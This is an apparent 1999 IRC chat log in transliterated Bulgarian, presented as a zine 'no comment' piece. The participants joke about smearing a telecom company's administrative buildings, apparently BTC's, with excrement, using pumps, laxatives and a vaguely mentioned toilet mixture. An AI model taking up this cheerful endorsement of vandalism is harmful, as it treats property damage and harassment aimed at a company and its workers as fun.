-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
>> EOI <<
#21 #21 #21 #21 #21 #21 #21 #21 #21 #21 #21 #21
[no comment]
irc://irc.ntrl.net#phm, Mon May 24 13:42:03 EST 1999
<IronCode> abe az podkrepiam ideiata na ManiaX - da se namazhe
administrativnata/ite sgradi s lania
<kay> IronCode: i az sym 'za' s 2 ryce :-)
<IronCode> privet ;-)
<IronCode> heheh ;-)
<PinkHat> hi
<darcosi> a ta i az tova go potkrepiam
<darcosi> hi
<PinkHat> che koj ne go podkrepq?
<kay> shte namerim ot nqkyde edin lajnowoz... te dali rabotqt i na
izpompwane oswen na wsmukwane ?
<IronCode> kay: estestveno, triabva da se prazniat niakak
<PinkHat> shto ne si porq4ame po Internet edin ton lajna i da se otkavem ot
<IronCode> eee... durzhavata shte namazhe togava :-(
<PinkHat> po to4no w polza na BTC
<darcosi> e to v sofia sa mnogo sgradite ama nisto kak sete se nameriat
tolkova laina
<kay> lajnata da sa ti problema ...
<IronCode> e kak... malko li sme? ;-) s malko trud shte suberem ;-)
<kay> ako trqbwa shte gi wzemem ot sobstwenite im kenefi
<PinkHat> :-)
<PinkHat> imam edin friend, sere po dwa puti na den, mnoo shte ni pomogne
<kay> edni biolozi ot nashata gimnaziq mi razprawqha za nqkakwa smes
deto se slaga w kenefa i posle... edin wid 'buhwat' i stawa golqm
kupon :-)
<IronCode> aaa, da, tova raboti ;-)
<PinkHat> shte si kupim powechko BIZALAX
<IronCode> probvano...
<darcosi> a da tova go znam i az
<IronCode> ama se chisti, be...
<IronCode> ako sa s kanalizacia - kofti
<IronCode> obache ako sa na shahta.... ;-) ;-)
<PinkHat> :)
<darcosi> ste im razkazem igrata na BTC ;)))
<IronCode> heh ;-)
<IronCode> ia niakoi s logove da go prati tova za PHM na EXo ;-)
EOF
]]>